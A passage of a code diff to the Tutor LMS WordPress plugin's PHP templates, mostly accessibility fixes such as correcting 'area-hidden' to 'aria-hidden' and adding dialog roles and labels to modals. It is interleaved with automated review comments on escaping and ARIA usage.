-							<i class="tutor-icon-coins" area-hidden="true"></i>
+							<i class="tutor-icon-coins" aria-hidden="true"></i>
 						</span>
 						<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo wp_kses_post( tutor_utils()->tutor_price( $earning_sum->total_income ) ); ?></div>
 						<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Total Earnings', 'tutor' ); ?></div>
@@ -302,7 +302,7 @@

 							<div class="tutor-row tutor-align-center">
 								<div class="tutor-col">
-									<div class="tutor-progress-bar tutor-mr-16" style="--tutor-progress-value:<?php echo esc_attr( $course_progress['completed_percent'] ); ?>%"><span class="tutor-progress-value" area-hidden="true"></span></div>
+									<div class="tutor-progress-bar tutor-mr-16" style="--tutor-progress-value:<?php echo esc_attr( $course_progress['completed_percent'] ); ?>%"><span class="tutor-progress-value" aria-hidden="true"></span></div>
 								</div>

 								<div class="tutor-col-auto">
--- a/tutor/templates/dashboard/instructor/registration.php
+++ b/tutor/templates/dashboard/instructor/registration.php
@@ -156,9 +156,18 @@
 			?>

 			<?php if ( null !== $tutor_toc_page_link ) : ?>
-				<div class="tutor-mb-24">
-					<?php esc_html_e( 'By signing up, I agree with the website's', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_attr_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
-				</div>
+				<div class="tutor-form-row tutor-mb-24">
+					<div class="tutor-form-col-12">
+						<div class="tutor-d-flex tutor-gap-1 tutor-align-center">
+							<div class="tutor-form-wrap">
+								<input type="checkbox" id="tutor-terms-conditions" name="terms_conditions" required>
+							</div>
+							<label for="tutor-terms-conditions">
+								<?php esc_html_e( 'By signing up, you agree to the', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
+							</label>
+						</div>
+					</div>
+				</div>
 			<?php endif; ?>

 			<div>
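Review bot: The `title` attribute on the new link uses `esc_html_e()` where the removed line used `esc_attr_e()`; attribute values should keep `esc_attr_e()`. The `required` attribute on the checkbox is only a browser-side check, so acceptance still depends on the server-side `terms_conditions` entry added to `$required_fields` in Instructor.php.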
--- a/tutor/templates/dashboard/my-courses.php
+++ b/tutor/templates/dashboard/my-courses.php
@@ -141,7 +141,7 @@
 							<div class="tutor-meta tutor-mt-16">
 								<?php if ( ! empty( $course_duration ) ) : ?>
 									<div>
-										<span class="tutor-icon-clock-line tutor-meta-icon" area-hidden="true"></span>
+										<span class="tutor-icon-clock-line tutor-meta-icon" aria-hidden="true"></span>
 										<span class="tutor-meta-value">
 										<?php
 										echo wp_kses(
@@ -157,7 +157,7 @@

 								<?php if ( ! empty( $course_students ) ) : ?>
 									<div>
-										<span class="tutor-icon-user-line tutor-meta-icon" area-hidden="true"></span>
+										<span class="tutor-icon-user-line tutor-meta-icon" aria-hidden="true"></span>
 										<span class="tutor-meta-value">
 										<?php
 										echo wp_kses(
@@ -196,11 +196,11 @@
 								</div>
 								<div class="tutor-iconic-btn-group tutor-mr-n8">
 									<a href="<?php echo esc_url( $course_edit_link ); ?>" class="tutor-iconic-btn tutor-my-course-edit">
-										<i class="tutor-icon-edit" area-hidden="true"></i>
+										<i class="tutor-icon-edit" aria-hidden="true"></i>
 									</a>
 									<div class="tutor-dropdown-parent">
 										<button type="button" class="tutor-iconic-btn" action-tutor-dropdown="toggle">
-											<span class="tutor-icon-kebab-menu" area-hidden="true"></span>
+											<span class="tutor-icon-kebab-menu" aria-hidden="true"></span>
 										</button>
 										<div id="table-dashboard-course-list-<?php echo esc_attr( $post->ID ); ?>" class="tutor-dropdown tutor-dropdown-dark tutor-text-left">

@@ -217,7 +217,7 @@
 												);
 												?>
 											<a class="tutor-dropdown-item" href="?<?php echo esc_attr( $params ); ?>">
-												<i class="tutor-icon-share tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-share tutor-mr-8" aria-hidden="true"></i>
 												<span>
 													<?php
 													$can_publish_course = current_user_can( 'administrator' ) || (bool) tutor_utils()->get_option( 'instructor_can_publish_course' );
@@ -243,7 +243,7 @@
 												);
 												?>
 											<a class="tutor-dropdown-item" href="?<?php echo esc_attr( $params ); ?>">
-												<i class="tutor-icon-copy-text tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-copy-text tutor-mr-8" aria-hidden="true"></i>
 												<span><?php esc_html_e( 'Duplicate', 'tutor' ); ?></span>
 											</a>
 											<?php endif; ?>
@@ -262,7 +262,7 @@
 												);
 												?>
 											<a class="tutor-dropdown-item" href="?<?php echo esc_attr( $params ); ?>">
-												<i class="tutor-icon-archive tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-archive tutor-mr-8" aria-hidden="true"></i>
 												<span><?php esc_html_e( 'Move to Draft', 'tutor' ); ?></span>
 											</a>
 											<?php endif; ?>
@@ -281,7 +281,7 @@
 												);
 												?>
 											<a href="?<?php echo esc_attr( $params ); ?>" class="tutor-dropdown-item">
-												<i class="tutor-icon-times tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-times tutor-mr-8" aria-hidden="true"></i>
 												<span><?php esc_html_e( 'Cancel Submission', 'tutor' ); ?></span>
 											</a>
 											<?php endif; ?>
@@ -291,7 +291,7 @@
 											<?php if ( $is_main_instructor && in_array( $post->post_status, array( CourseModel::STATUS_PUBLISH, CourseModel::STATUS_DRAFT, CourseModel::STATUS_FUTURE ) ) ) : ?>
 												<?php if ( $show_course_delete ) : ?>
 												<a href="#" data-tutor-modal-target="<?php echo esc_attr( $id_string_delete ); ?>" class="tutor-dropdown-item tutor-admin-course-delete">
-													<i class="tutor-icon-trash-can-bold tutor-mr-8" area-hidden="true"></i>
+													<i class="tutor-icon-trash-can-bold tutor-mr-8" aria-hidden="true"></i>
 													<span><?php esc_html_e( 'Delete', 'tutor' ); ?></span>
 												</a>
 												<?php endif; ?>
@@ -305,20 +305,20 @@
 						</div>

 						<!-- Delete prompt modal -->
-						<div id="<?php echo esc_attr( $id_string_delete ); ?>" class="tutor-modal">
+						<div id="<?php echo esc_attr( $id_string_delete ); ?>" class="tutor-modal" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_attr( $id_string_delete ); ?>-title" aria-hidden="true">
 							<div class="tutor-modal-overlay"></div>
 							<div class="tutor-modal-window">
 								<div class="tutor-modal-content tutor-modal-content-white">
-									<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-										<span class="tutor-icon-times" area-hidden="true"></span>
+									<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+										<span class="tutor-icon-times" aria-hidden="true"></span>
 									</button>

 									<div class="tutor-modal-body tutor-text-center">
 										<div class="tutor-mt-48">
-											<img class="tutor-d-inline-block" src="<?php echo esc_attr( tutor()->url ); ?>assets/images/icon-trash.svg" />
+											<img class="tutor-d-inline-block" src="<?php echo esc_attr( tutor()->url ); ?>assets/images/icon-trash.svg" alt="<?php esc_attr_e( 'Delete This Course?', 'tutor' ); ?>" aria-hidden="true" />
 										</div>

-										<div class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php esc_html_e( 'Delete This Course?', 'tutor' ); ?></div>
+										<div id="<?php echo esc_attr( $id_string_delete ); ?>-title" class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php esc_html_e( 'Delete This Course?', 'tutor' ); ?></div>
 										<div class="tutor-fs-6 tutor-color-muted"><?php esc_html_e( 'Are you sure you want to delete this course permanently from the site? Please confirm your choice.', 'tutor' ); ?></div>

 										<div class="tutor-d-flex tutor-justify-center tutor-my-48">
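Review bot: The trash icon `<img>` in the delete modal now carries both `alt="<?php esc_attr_e( 'Delete This Course?', 'tutor' ); ?>"` and `aria-hidden="true"`, which contradict each other: the alt text can never be announced, and if the hiding were later dropped it would duplicate the title div directly below. The image is decorative, so use `alt=""` as the confirm.php hunk in this patch does, and let the `-title` element name the dialog.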
--- a/tutor/templates/dashboard/purchase_history.php
+++ b/tutor/templates/dashboard/purchase_history.php
@@ -286,7 +286,7 @@
 										<?php endif; ?>
 										<?php $courses_data_string = implode( ',', array_map( fn( $course_data ) => get_the_title( $course_data['course_id'] ), $courses ) ); ?>
 										<a href="javascript:;" class="tutor-export-purchase-history tutor-iconic-btn tutor-iconic-btn-secondary" data-order="<?php echo esc_attr( $order->ID ); ?>" data-course-name="<?php echo esc_attr( '"' . $courses_data_string . '"' ); ?>" data-price="<?php echo esc_attr( $raw_price ); ?>" data-date="<?php echo esc_attr( '"' . date_i18n( get_option( 'date_format' ), strtotime( $order->post_date ) ) . '"' ); ?>" data-status="<?php echo esc_attr( $order_status_text ); ?>">
-											<span class="tutor-icon-receipt-line" area-hidden="true"></span>
+											<span class="tutor-icon-receipt-line" aria-hidden="true"></span>
 										</a>
 									</div>
 								</td>
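Review bot: The export link is icon-only, and with the receipt icon now hidden via `aria-hidden="true"` the `<a href="javascript:;" class="tutor-export-purchase-history ...">` has no accessible name at all. Add an `aria-label` (translated through `esc_attr_e`) to the anchor, as this patch does for the modal close buttons, and consider a `<button type="button">` since the element triggers an action rather than navigating.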
--- a/tutor/templates/dashboard/registration.php
+++ b/tutor/templates/dashboard/registration.php
@@ -157,9 +157,18 @@
 				$tutor_toc_page_link = tutor_utils()->get_toc_page_link();
 			?>
 			<?php if ( null !== $tutor_toc_page_link ) : ?>
-				<div class="tutor-mb-24">
-					<?php esc_html_e( 'By signing up, I agree with the website's', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
-				</div>
+				<div class="tutor-form-row tutor-mb-24">
+					<div class="tutor-form-col-12">
+						<div class="tutor-d-flex tutor-gap-1 tutor-align-center">
+							<div class="tutor-form-wrap">
+								<input type="checkbox" id="tutor-terms-conditions" name="terms_conditions" required>
+							</div>
+							<label for="tutor-terms-conditions">
+								<?php esc_html_e( 'By signing up, you agree to the ', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
+							</label>
+						</div>
+					</div>
+				</div>
 			<?php endif; ?>

 			<div>
--- a/tutor/templates/dashboard/reviews/given-reviews.php
+++ b/tutor/templates/dashboard/reviews/given-reviews.php
@@ -72,12 +72,12 @@
 							<div class="tutor-col-auto">
 								<div class="tutor-given-review-actions tutor-d-flex">
 									<span class="tutor-btn tutor-btn-ghost" data-tutor-modal-target="<?php echo esc_html( $update_id ); ?>" role="button">
-										<i class="tutor-icon-edit tutor-mr-8" area-hidden="true"></i>
+										<i class="tutor-icon-edit tutor-mr-8" aria-hidden="true"></i>
 										<span><?php esc_html_e( 'Edit', 'tutor' ); ?></span>
 									</span>

 									<span class="tutor-btn tutor-btn-ghost tutor-ml-16" data-tutor-modal-target="<?php echo esc_html( $delete_id ); ?>" role="button">
-										<i class="tutor-icon-trash-can-line tutor-mr-8"  area-hidden="true"></i>
+										<i class="tutor-icon-trash-can-line tutor-mr-8" aria-hidden="true"></i>
 										<span><?php esc_html_e( 'Delete', 'tutor' ); ?></span>
 									</span>
 								</div>
@@ -90,16 +90,16 @@
 					</div>

 					<!-- Edit Review Modal -->
-					<form class="tutor-modal" id="<?php echo esc_html( $update_id ); ?>">
+					<form class="tutor-modal" id="<?php echo esc_html( $update_id ); ?>" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_html( $update_id ); ?>-title" aria-hidden="true">
 						<div class="tutor-modal-overlay"></div>
 						<div class="tutor-modal-window">
 							<div class="tutor-modal-content tutor-modal-content-white">
-								<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-									<span class="tutor-icon-times" area-hidden="true"></span>
+								<button type="button" class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+									<span class="tutor-icon-times" aria-hidden="true"></span>
 								</button>

 								<div class="tutor-modal-body tutor-text-center">
-									<div class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mt-48 tutor-mb-12"><?php esc_html_e( 'How would you rate this course?', 'tutor' ); ?></div>
+									<div id="<?php echo esc_html( $update_id ); ?>-title" class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mt-48 tutor-mb-12"><?php esc_html_e( 'How would you rate this course?', 'tutor' ); ?></div>
 									<div class="tutor-fs-6 tutor-color-muted"><?php esc_html_e( 'Select Rating', 'tutor' ); ?></div>

 									<input type="hidden" name="course_id" value="<?php echo esc_html( $review->comment_post_ID ); ?>"/>
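Review bot: The new `aria-labelledby` value on the form and the new `id` on the title div print `$update_id` with `esc_html()` inside an attribute; use `esc_attr()` there, as the same change does in the delete-course modal and in modal/alert.php. Also check `role="dialog"` on the `<form>` itself: it replaces the element's form role for assistive technology, so wrapping the form in a dialog container may be the cleaner structure. Adding `type="button"` to the close button is a good catch, since inside a form it would otherwise submit.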
@@ -112,7 +112,7 @@
 									?>
 									</div>

-									<textarea class="tutor-form-control tutor-mt-28" name="review" placeholder="<?php esc_html_e( 'write a review', 'tutor' ); ?>"><?php echo esc_html( stripslashes( $review->comment_content ) ); ?></textarea>
+									<textarea class="tutor-form-control tutor-mt-28" name="review" aria-label="<?php esc_attr_e( 'Update your review', 'tutor' ); ?>" placeholder="<?php esc_html_e( 'write a review', 'tutor' ); ?>"><?php echo esc_html( stripslashes( $review->comment_content ) ); ?></textarea>

 									<div class="tutor-d-flex tutor-justify-center tutor-my-48">
 										<button type="button" class="tutor-btn tutor-btn-outline-primary" data-tutor-modal-close data-action="back">
--- a/tutor/templates/dashboard/settings/profile.php
+++ b/tutor/templates/dashboard/settings/profile.php
@@ -74,7 +74,7 @@
 			</span>
 			<div class="tutor_overlay">
 				<button class="tutor_cover_uploader tutor-btn tutor-btn-primary">
-					<i class="tutor-icon-camera tutor-mr-12" area-hidden="true"></i>
+					<i class="tutor-icon-camera tutor-mr-12" aria-hidden="true"></i>
 					<span><?php echo $profile_photo_id ? esc_html__( 'Update Cover Photo', 'tutor' ) : esc_html__( 'Upload Cover Photo', 'tutor' ); ?></span>
 				</button>
 			</div>
--- a/tutor/templates/dashboard/withdraw.php
+++ b/tutor/templates/dashboard/withdraw.php
@@ -60,7 +60,7 @@
 		<div class="tutor-row tutor-align-lg-center">
 			<div class="tutor-col-lg-auto tutor-mb-16 tutor-mb-lg-0">
 				<div class="tutor-round-box tutor-p-8">
-					<i class="tutor-icon-wallet" area-hidden="true"></i>
+					<i class="tutor-icon-wallet" aria-hidden="true"></i>
 				</div>
 			</div>

@@ -130,21 +130,21 @@
 	<?php
 	if ( $is_balance_sufficient && $withdraw_method_name ) {
 		?>
-		<div id="tutor-earning-withdraw-modal" class="tutor-modal">
+		<div id="tutor-earning-withdraw-modal" class="tutor-modal" role="dialog" aria-modal="true" aria-labelledby="tutor-withdraw-modal-title" aria-hidden="true">
 			<div class="tutor-modal-overlay"></div>
 			<div class="tutor-modal-window">
 				<div class="tutor-modal-content tutor-modal-content-white">
-					<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-						<span class="tutor-icon-times" area-hidden="true"></span>
+					<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+						<span class="tutor-icon-times" aria-hidden="true"></span>
 					</button>

 					<div class="tutor-modal-body">
 						<div class="tutor-py-20 tutor-px-24">
 							<div class="tutor-round-box tutor-round-box-lg tutor-mb-16">
-								<span class="tutor-icon-wallet" area-hidden="true"></span>
+								<span class="tutor-icon-wallet" aria-hidden="true"></span>
 							</div>

-							<div class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-24"><?php esc_html_e( 'Withdrawal Request', 'tutor' ); ?></div>
+							<div id="tutor-withdraw-modal-title" class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-24"><?php esc_html_e( 'Withdrawal Request', 'tutor' ); ?></div>
 							<div class="tutor-fs-6 tutor-color-muted"><?php esc_html_e( 'Please check your transaction notification on your connected withdrawal method', 'tutor' ); ?></div>

 							<div class="tutor-row tutor-mt-32">
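Review bot: `aria-hidden="true"` is hard-coded on `#tutor-earning-withdraw-modal`, and the same pattern is used on every dialog this patch touches. Unless the modal script sets it to `false` (or removes it) when the dialog opens and restores it on close, an open dialog stays hidden from assistive technology while `aria-modal="true"` tells it everything else is inert. That script is not part of this diff, so please confirm the toggle exists or include it here.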
@@ -160,7 +160,7 @@
 							</div>
 						</div>

-						<div class="tutor-mx-n32 tutor-my-32"><div class="tutor-hr" area-hidden="true"></div></div>
+						<div class="tutor-mx-n32 tutor-my-32"><div class="tutor-hr" aria-hidden="true"></div></div>

 						<form id="tutor-earning-withdraw-form" method="post">
 							<div class="tutor-py-20 tutor-px-24">
@@ -176,7 +176,7 @@
 									</div>

 									<div class="tutor-form-help tutor-d-flex tutor-align-center">
-										<span class="tutor-icon-circle-question-mark tutor-mr-8" area-hidden="true"></span>
+										<span class="tutor-icon-circle-question-mark tutor-mr-8" aria-hidden="true"></span>
 										<span><?php echo wp_kses( __( 'Minimum withdraw amount is', 'tutor' ) . ' ' . $formatted_min_withdraw_amount, array() ); ?></span>
 									</div>

--- a/tutor/templates/ecommerce/checkout-details.php
+++ b/tutor/templates/ecommerce/checkout-details.php
@@ -100,7 +100,7 @@
 											</h6>
 										</div>
 										<div class="tutor-checkout-coupon-badge <?php echo esc_attr( $item->is_coupon_applied ? '' : 'tutor-d-none' ); ?>">
-											<i class="tutor-icon-tag" area-hidden="true"></i>
+											<i class="tutor-icon-tag" aria-hidden="true"></i>
 											<span><?php echo esc_html( $item->is_coupon_applied ? $checkout_data->coupon_title : '' ); ?></span>
 										</div>
 									</div>
@@ -170,12 +170,12 @@

 			<div class="tutor-checkout-summary-item tutor-checkout-coupon-wrapper <?php echo esc_attr( $checkout_data->is_coupon_applied ? '' : 'tutor-d-none' ); ?>">
 				<div class="tutor-checkout-coupon-badge tutor-has-delete-button">
-					<i class="tutor-icon-tag" area-hidden="true"></i>
+					<i class="tutor-icon-tag" aria-hidden="true"></i>
 					<span><?php echo esc_html( $checkout_data->coupon_title ); ?></span>

 					<?php if ( $checkout_data->is_coupon_applied ) : ?>
 					<button type="button" id="tutor-checkout-remove-coupon" class="tutor-btn">
-						<i class="tutor-icon-times" area-hidden="true"></i>
+						<i class="tutor-icon-times" aria-hidden="true"></i>
 					</button>
 					<?php endif; ?>
 				</div>
--- a/tutor/templates/global/attachments.php
+++ b/tutor/templates/global/attachments.php
@@ -32,7 +32,7 @@

 							<div class="tutor-col-auto">
 								<a href="<?php echo esc_url( $attachment->url ); ?>" class="tutor-iconic-btn tutor-iconic-btn-secondary tutor-stretched-link" <?php echo esc_attr( $open_mode_view ? $open_mode_view : "download={$attachment->name}" ); ?>>
-									<span class="tutor-icon-download" area-hidden="true"></span>
+									<span class="tutor-icon-download" aria-hidden="true"></span>
 								</a>
 							</div>
 						</div>
--- a/tutor/templates/login-form.php
+++ b/tutor/templates/login-form.php
@@ -63,7 +63,7 @@
 		<input type="password" class="tutor-form-control" placeholder="<?php esc_html_e( 'Password', 'tutor' ); ?>" name="pwd" value="" size="20" required/>
 	</div>

-	<div class="tutor-login-error"></div>
+	<div class="tutor-login-error" role="alert" aria-live="polite"></div>
 	<?php
 		do_action( 'tutor_login_form_middle' );
 		do_action( 'login_form' );
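Review bot: On `.tutor-login-error`, `role="alert"` already implies an assertive live region, so pairing it with `aria-live="polite"` gives conflicting instructions and screen readers differ on which one wins. Pick one: keep `role="alert"` alone if a failed login should interrupt, or use `role="status"` if a polite announcement is intended.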
@@ -85,7 +85,7 @@
 	<button type="submit" class="tutor-btn tutor-btn-primary tutor-btn-block">
 		<?php esc_html_e( 'Sign In', 'tutor' ); ?>
 	</button>
-
+
 	<?php if ( get_option( 'users_can_register', false ) ) : ?>
 		<?php
 			$url_arg = array(
@@ -106,10 +106,10 @@
 </form>
 <?php
 do_action( 'tutor_after_login_form' );
-if ( ! tutor_utils()->is_tutor_frontend_dashboard() ) : ?>
+if ( ! tutor_utils()->is_tutor_frontend_dashboard() ) :
+	?>
 <script>
 	document.addEventListener('DOMContentLoaded', function() {
-		var { __ } = wp.i18n;
 		var loginModal = document.querySelector('.tutor-modal.tutor-login-modal');
 		var errors = <?php echo wp_json_encode( $login_errors ); ?>;
 		if (loginModal && errors.length) {
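Review bot: Removing `var { __ } = wp.i18n;` is only safe if nothing later in this inline script still calls `__()`; the rest of the block is outside the visible context, so a leftover call would now throw a ReferenceError at DOMContentLoaded or resolve to an unrelated global. Please confirm with a search of the script body. The move of `?>` onto its own line is formatting only.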
--- a/tutor/templates/loop/course-price-tutor.php
+++ b/tutor/templates/loop/course-price-tutor.php
@@ -59,7 +59,7 @@

 				<div class="tutor-course-booking-progress tutor-d-flex tutor-align-center">
 					<div class="tutor-mr-8">
-						<div class="tutor-progress-circle" style="--pro: <?php echo esc_html( $b_total ) . '%'; ?>" area-hidden="true"></div>
+						<div class="tutor-progress-circle" style="--pro: <?php echo esc_html( $b_total ) . '%'; ?>" aria-hidden="true"></div>
 					</div>
 					<div class="tutor-fs-7 tutor-fw-medium tutor-color-black">
 					<?php echo esc_html( $b_total ) . __( '% Booked', 'tutor' ); ?>
--- a/tutor/templates/loop/course-price-woocommerce.php
+++ b/tutor/templates/loop/course-price-woocommerce.php
@@ -59,7 +59,7 @@

                     <div class="tutor-course-booking-progress tutor-d-flex tutor-align-center">
                         <div class="tutor-mr-8">
-                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" area-hidden="true"></div>
+                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" aria-hidden="true"></div>
                         </div>
                         <div class="tutor-fs-7 tutor-fw-medium tutor-color-black">' .
 						esc_html( $b_total ) . __( '% Booked', 'tutor' ) . '
--- a/tutor/templates/loop/course-price.php
+++ b/tutor/templates/loop/course-price.php
@@ -60,7 +60,7 @@

                     <div class="tutor-course-booking-progress tutor-d-flex tutor-align-center">
                         <div class="tutor-mr-8">
-                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" area-hidden="true"></div>
+                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" aria-hidden="true"></div>
                         </div>
                         <div class="tutor-fs-7 tutor-fw-medium tutor-color-black">' .
 						esc_html( $b_total ) . __( '% Booked', 'tutor' ) . '
--- a/tutor/templates/loop/enrolled-course-progress.php
+++ b/tutor/templates/loop/enrolled-course-progress.php
@@ -24,6 +24,6 @@
 		</span>
 	</div>
 	<div class="tutor-progress-bar tutor-mt-12" style="--tutor-progress-value:<?php echo esc_attr( $course_progress['completed_percent'] ); ?>%;">
-		<span class="tutor-progress-value" area-hidden="true"></span>
+		<span class="tutor-progress-value" aria-hidden="true"></span>
 	</div>
 </div>
--- a/tutor/templates/loop/meta.php
+++ b/tutor/templates/loop/meta.php
@@ -23,14 +23,14 @@
 <div class="tutor-meta tutor-mt-12 tutor-mb-20">
 	<?php if ( tutor_utils()->get_option( 'enable_course_total_enrolled' ) ) : ?>
 		<div>
-			<span class="tutor-meta-icon tutor-icon-user-line" area-hidden="true"></span>
+			<span class="tutor-meta-icon tutor-icon-user-line" aria-hidden="true"></span>
 			<span class="tutor-meta-value"><?php echo esc_html( $course_students ); ?></span>
 		</div>
 	<?php endif; ?>

 	<?php if ( ! empty( $course_duration ) ) : ?>
 		<div>
-			<span class="tutor-icon-clock-line tutor-meta-icon" area-hidden="true"></span>
+			<span class="tutor-icon-clock-line tutor-meta-icon" aria-hidden="true"></span>
 			<span class="tutor-meta-value">
 				<?php
                     //phpcs:ignore --escaping through helper method
--- a/tutor/templates/metabox-wrapper.php
+++ b/tutor/templates/metabox-wrapper.php
@@ -12,7 +12,7 @@
 <div class="tutor-course-builder-section">
 	<div class="tutor-course-builder-section-title">
 		<span class="tutor-fs-5 tutor-fw-bold tutor-color-secondary">
-			<i class="tutor-icon-angle-up" area-hidden="true"></i>
+			<i class="tutor-icon-angle-up" aria-hidden="true"></i>
 			<span><?php echo esc_html( $title ); ?></span>
 		</span>
 	</div>
--- a/tutor/templates/modal/alert.php
+++ b/tutor/templates/modal/alert.php
@@ -10,25 +10,25 @@
  * @since 2.0.2
  */

-$id      = isset( $id ) ? $id : ''; //phpcs:ignore
+$id      = isset( $id ) ? $id : 'tutor-alert-modal-' . uniqid(); // Ensure we have an ID for ARIA.
 $class   = isset( $class ) ? ' ' . $class : '';
 $title   = isset( $title ) ? $title : 'Do You Want to Delete This?'; // phpcs:ignore
 $content = isset( $content ) ? $content : '';
 $close   = isset( $close ) ? (bool) $close : true;
 ?>
-<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>">
+<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_attr( $id ); ?>-title" aria-hidden="true">
 	<div class="tutor-modal-overlay"></div>
 	<div class="tutor-modal-window tutor-modal-window-sm">
 		<div class="tutor-modal-content tutor-modal-content-white">
 			<?php if ( $close ) : ?>
-			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-				<span class="tutor-icon-times" area-hidden="true"></span>
+			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+				<span class="tutor-icon-times" aria-hidden="true"></span>
 			</button>
 			<?php endif; ?>
 			<div class="tutor-modal-body tutor-text-center">
 				<div class="tutor-my-32">
 					<?php if ( $title ) : ?>
-						<div class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-8"><?php echo esc_html( $title ); ?></div>
+						<div id="<?php echo esc_attr( $id ); ?>-title" class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-8"><?php echo esc_html( $title ); ?></div>
 					<?php endif; ?>
 					<?php if ( $content ) : ?>
 						<div class="tutor-fs-6 tutor-color-muted"><?php echo esc_html( $content ); ?></div>
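Review bot: The wrapper always emits `aria-labelledby="<id>-title"`, but the element with that id is rendered only inside `if ( $title )`, so a caller passing an empty title leaves the dialog pointing at a label that does not exist. Emit the attribute under the same condition, or fall back to an `aria-label`. The `//phpcs:ignore` that was on the `$id` line is also dropped without explanation; if the sniff it silenced still fires, keep the annotation.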
--- a/tutor/templates/modal/confirm.php
+++ b/tutor/templates/modal/confirm.php
@@ -10,7 +10,7 @@
  * @since 2.0.2
  */

-$id      = isset( $id ) ? $id : ''; //phpcs:ignore
+$id      = isset( $id ) ? $id : 'tutor-confirm-modal-' . uniqid(); // Ensure we have an ID for ARIA.
 $class   = isset( $class ) ? ' ' . $class : '';
 $image   = isset( $image ) ? $image : '';
 $icon    = isset( $icon ) ? $icon : '';
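Review bot: Defaulting `$id` to `'tutor-confirm-modal-' . uniqid()` yields a different id on every render, so it works only as an ARIA anchor; any trigger that opens this modal through `data-tutor-modal-target` needs a known id and must keep passing one explicitly. Worth a line in the template docblock saying the fallback is not addressable, or use `wp_unique_id( 'tutor-confirm-modal-' )` for a short per-request counter instead of a time-derived value.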
@@ -19,31 +19,31 @@
 $yes     = isset( $yes ) ? $yes : array( 'text' => __( 'Yes', 'tutor' ) );
 $close   = isset( $close ) ? (bool) $close : true;
 ?>
-<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>">
+<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_attr( $id ); ?>-title" aria-hidden="true">
 	<div class="tutor-modal-overlay"></div>
 	<div class="tutor-modal-window">
 		<div class="tutor-modal-content tutor-modal-content-white">
 			<?php if ( $close ) : ?>
-			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-				<span class="tutor-icon-times" area-hidden="true"></span>
+			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+				<span class="tutor-icon-times" aria-hidden="true"></span>
 			</button>
 			<?php endif; ?>
 			<div class="tutor-modal-body tutor-text-center">
 				<div class="tutor-px-lg-48 tutor-py-lg-24">
 					<?php if ( $image ) : ?>
 						<div class="tutor-mt-24">
-							<img class="tutor-d-inline-block" src="<?php echo esc_url( tutor()->url ); ?>assets/images/<?php echo esc_attr( $image ); ?>" />
+							<img class="tutor-d-inline-block" src="<?php echo esc_url( tutor()->url ); ?>assets/images/<?php echo esc_attr( $image ); ?>" alt="" />
 						</div>
 					<?php endif; ?>

 					<?php if ( $icon ) : ?>
 						<div class="tutor-mt-24">
-							<span class="tutor-d-inline-block"><?php echo esc_attr( $icon ); ?></span>
+							<span class="tutor-d-inline-block" aria-hidden="true"><?php echo esc_attr( $icon ); ?></span>
 						</div>
 					<?php endif; ?>

 					<?php if ( $title ) : ?>
-						<div class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php echo esc_html( $title ); ?></div>
+						<div id="<?php echo esc_attr( $id ); ?>-title" class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php echo esc_html( $title ); ?></div>
 					<?php endif; ?>

 					<?php if ( $content ) : ?>
